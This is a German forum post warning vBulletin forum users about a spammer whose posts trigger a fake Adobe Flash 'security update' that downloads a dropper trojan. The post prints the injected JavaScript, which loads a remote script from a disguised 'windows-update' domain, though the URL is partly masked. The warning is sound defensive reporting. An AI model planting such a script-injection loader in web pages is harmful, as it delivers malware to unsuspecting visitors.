|
Scriptkiddie in Foren unterwegs... Mahlzeit! Momentan ist in diversen vBulletin®Foren ein Sctiptkiddie unterwegs. Der User registriert sich momentan in sämtlichen Foren, meistens als "AnaJu" und verteilt seine Beiträge. Sollten bei Euch beim Anklicken eines Beitrages Updatehinweise für ein "dringendes Sicherheitsupdate" für den "Adobe Flash Player" aufgehen und ein Programmdownload aufgehen - nicht annehmen. Es handelt sich dabei um ein Script, welches anscheinend in erster Linie über vBulletin® Foren verbreitet werden soll und welches sich weitere Programme aus dem Internet nachladen soll. Antivir z.B. erkennt diese datei als 'TR/Dropper.Gen' Es würde mich nicht wundern, wenn er hier im Forum auch auftauchen wird. Bisher scheint er vom Münzforum über Autos und Militaria alles durch zu haben.... Vielleicht ist er hier ja auch schon jemandem irgendwo aufgefallen. Ich hab nur noch nicht so ganz raus, warum er das so exessiv betreibt.... Mag sein, dass er ein Bot-Netz bilden will.... Das Script sieht folgendermaßen aus: <!-- message --> <div id="post_message_617519"> HIER STEHT DER TEXT<br /> <br /> <XXXXXX language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updatXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script> </div> <div align="center"> </div> <!-- / message --> Vielleicht hat ja noch jemand ne Idee, was es damit aufsich hat.... |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 04:35 Uhr. |
Copyright ©2000-2025, Trojaner-Board